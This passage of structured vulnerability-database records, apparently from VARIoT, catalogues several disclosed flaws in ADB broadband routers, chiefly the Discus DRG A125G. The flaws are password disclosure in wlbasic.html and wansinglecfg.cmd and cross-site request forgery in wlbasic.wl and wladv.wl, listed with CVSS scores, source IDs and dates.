"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-12784"
},
{
"db": "VULHUB",
"id": "VHN-123134"
},
{
"db": "VULMON",
"id": "CVE-2018-13108"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007687"
},
{
"db": "NVD",
"id": "CVE-2018-13108"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-444"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-07-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-12784"
},
{
"date": "2018-07-06T00:00:00",
"db": "VULHUB",
"id": "VHN-123134"
},
{
"date": "2018-07-06T00:00:00",
"db": "VULMON",
"id": "CVE-2018-13108"
},
{
"date": "2018-09-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-007687"
},
{
"date": "2018-07-06T14:29:01.053000",
"db": "NVD",
"id": "CVE-2018-13108"
},
{
"date": "2018-07-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201807-444"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-07-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-12784"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-123134"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULMON",
"id": "CVE-2018-13108"
},
{
"date": "2018-09-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-007687"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2018-13108"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201807-444"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201807-444"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural ADB Vulnerabilities related to access control in broadband gateways and routers",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-007687"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201807-444"
}
],
"trust": 0.6
}
}
VAR-201311-0449
Vulnerability from variot - Updated: 2022-05-17 02:10Discus DRG A125G is a wireless router product from Swiss ADB company. An information disclosure vulnerability exists in Discus DRG A125G. Attackers can use this vulnerability to obtain sensitive information that can help launch further attacks. Discus DRG A125G is vulnerable; other versions may also be affected
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201311-0449",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "discus drg a125g",
"scope": null,
"trust": 0.6,
"vendor": "adb",
"version": null
},
{
"model": "discus drg a125g",
"scope": "eq",
"trust": 0.3,
"vendor": "adb",
"version": "0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14741"
},
{
"db": "BID",
"id": "63905"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sebastin Magof",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-436"
}
],
"trust": 0.6
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2013-14741",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2013-14741",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14741"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Discus DRG A125G is a wireless router product from Swiss ADB company. \nAn information disclosure vulnerability exists in Discus DRG A125G. Attackers can use this vulnerability to obtain sensitive information that can help launch further attacks. \nDiscus DRG A125G is vulnerable; other versions may also be affected",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14741"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-436"
},
{
"db": "BID",
"id": "63905"
}
],
"trust": 1.35
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "63905",
"trust": 1.5
},
{
"db": "CNVD",
"id": "CNVD-2013-14741",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201311-436",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14741"
},
{
"db": "BID",
"id": "63905"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-436"
}
]
},
"id": "VAR-201311-0449",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14741"
}
],
"trust": 1.4
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14741"
}
]
},
"last_update_date": "2022-05-17T02:10:39.017000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/63905"
},
{
"trust": 0.3,
"url": "http://broadband.adbglobal.com/"
},
{
"trust": 0.3,
"url": "www.pirellibroadband.com"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14741"
},
{
"db": "BID",
"id": "63905"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-436"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-14741"
},
{
"db": "BID",
"id": "63905"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-436"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-14741"
},
{
"date": "2013-11-24T00:00:00",
"db": "BID",
"id": "63905"
},
{
"date": "2013-11-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-436"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-14741"
},
{
"date": "2013-11-24T00:00:00",
"db": "BID",
"id": "63905"
},
{
"date": "2013-12-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-436"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-436"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ADB Discus DRG A125G \u0027wlbasic.html\u0027 Password Information Disclosure Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14741"
},
{
"db": "BID",
"id": "63905"
}
],
"trust": 0.9
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-436"
}
],
"trust": 0.6
}
}
VAR-201311-0488
Vulnerability from variot - Updated: 2022-05-17 01:45ADB Discus DRG A125G wlbasic.wl and wladv.wl have cross-site request forgery vulnerabilities that allow remote attackers to build malicious URIs, entice users to resolve, and perform malicious operations in the target user context. Discus DRG A125G is a wireless router product from Swiss ADB company. Cross-site request forgery vulnerability exists in ADB Discus DRG A125G router. A remote attacker could use this vulnerability to perform unauthorized operations and take control of an affected device
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201311-0488",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "discus drg a125g",
"scope": null,
"trust": 0.9,
"vendor": "adb",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14742"
},
{
"db": "BID",
"id": "63907"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sebastin Magof",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-438"
}
],
"trust": 0.6
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.8,
"id": "CNVD-2013-14742",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:S/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2013-14742",
"trust": 0.6,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14742"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ADB Discus DRG A125G wlbasic.wl and wladv.wl have cross-site request forgery vulnerabilities that allow remote attackers to build malicious URIs, entice users to resolve, and perform malicious operations in the target user context. Discus DRG A125G is a wireless router product from Swiss ADB company. \nCross-site request forgery vulnerability exists in ADB Discus DRG A125G router. A remote attacker could use this vulnerability to perform unauthorized operations and take control of an affected device",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14742"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-438"
},
{
"db": "BID",
"id": "63907"
}
],
"trust": 1.35
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "63907",
"trust": 1.5
},
{
"db": "CNVD",
"id": "CNVD-2013-14742",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201311-438",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14742"
},
{
"db": "BID",
"id": "63907"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-438"
}
]
},
"id": "VAR-201311-0488",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14742"
}
],
"trust": 1.4
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14742"
}
]
},
"last_update_date": "2022-05-17T01:45:23.686000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/63907"
},
{
"trust": 0.3,
"url": "http://www.pirellibroadband.com/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14742"
},
{
"db": "BID",
"id": "63907"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-438"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-14742"
},
{
"db": "BID",
"id": "63907"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-438"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-14742"
},
{
"date": "2013-11-24T00:00:00",
"db": "BID",
"id": "63907"
},
{
"date": "2013-11-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-438"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-14742"
},
{
"date": "2013-11-24T00:00:00",
"db": "BID",
"id": "63907"
},
{
"date": "2013-12-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-438"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-438"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple Cross-Site Request Forgery Vulnerabilities in ADB Discus DRG A125G",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14742"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-438"
}
],
"trust": 0.6
}
}
VAR-201310-0700
Vulnerability from variot - Updated: 2022-05-17 01:43The ADB Discus DRG A125G 'wansinglecfg.cmd' script has a security vulnerability that allows a remote attacker to exploit a vulnerability to submit a request for password information. Discus DRG A125G is a wireless router product from Swiss ADB company. A password disclosure vulnerability exists in Discus DRG A125G. Attackers can use this vulnerability to obtain sensitive information that can help launch further attacks. Discus DRG A125G version has vulnerabilities, other versions may also be affected
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201310-0700",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "discus drg a125g",
"scope": null,
"trust": 0.6,
"vendor": "adb",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14198"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sebastin Magof",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201310-686"
}
],
"trust": 0.6
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2013-14198",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2013-14198",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14198"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The ADB Discus DRG A125G \u0027wansinglecfg.cmd\u0027 script has a security vulnerability that allows a remote attacker to exploit a vulnerability to submit a request for password information. Discus DRG A125G is a wireless router product from Swiss ADB company. \nA password disclosure vulnerability exists in Discus DRG A125G. Attackers can use this vulnerability to obtain sensitive information that can help launch further attacks. Discus DRG A125G version has vulnerabilities, other versions may also be affected",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14198"
},
{
"db": "CNNVD",
"id": "CNNVD-201310-686"
},
{
"db": "BID",
"id": "63393"
}
],
"trust": 1.35
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "63393",
"trust": 1.5
},
{
"db": "CNVD",
"id": "CNVD-2013-14198",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201310-686",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14198"
},
{
"db": "BID",
"id": "63393"
},
{
"db": "CNNVD",
"id": "CNNVD-201310-686"
}
]
},
"id": "VAR-201310-0700",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14198"
}
],
"trust": 1.4
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14198"
}
]
},
"last_update_date": "2022-05-17T01:43:24.099000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/63393"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14198"
},
{
"db": "CNNVD",
"id": "CNNVD-201310-686"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-14198"
},
{
"db": "BID",
"id": "63393"
},
{
"db": "CNNVD",
"id": "CNNVD-201310-686"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-01T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-14198"
},
{
"date": "2013-10-29T00:00:00",
"db": "BID",
"id": "63393"
},
{
"date": "2013-10-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201310-686"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-01T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-14198"
},
{
"date": "2013-10-29T00:00:00",
"db": "BID",
"id": "63393"
},
{
"date": "2013-10-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201310-686"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201310-686"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ADB Discus DRG A125G \u0027wansinglecfg.cmd\u0027 Password Disclosure Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14198"
},
{
"db": "BID",
"id": "63393"
}
],
"trust": 0.9
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201310-686"
}
],
"trust": 0.6
}
}